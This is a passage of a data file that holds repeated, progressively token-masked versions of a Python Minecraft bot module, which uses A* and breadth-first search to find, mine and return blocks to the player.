mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': (imag_bot.get_pos(\n ) + player_loc) / 2, 'kwargs': {'block': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n <function token>\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n <assignment token>\n <function token>\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n <function token>\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n <function token>\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n <assignment token>\n <function token>\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n <function token>\n <function token>\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n <function token>\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n <assignment token>\n <function token>\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n <function token>\n <function token>\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n <function token>\n <function token>\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n <assignment token>\n <function token>\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n <assignment token>\n <function token>\n <function token>\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n\n\nclass Bot(_GenericBot):\n <docstring token>\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in _all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialized the problem with an _ImaginaryBot.\n\n block is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n", "<docstring token>\n<import token>\n<assignment token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass FindProblem(SearchProblem):\n <docstring token>\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n return 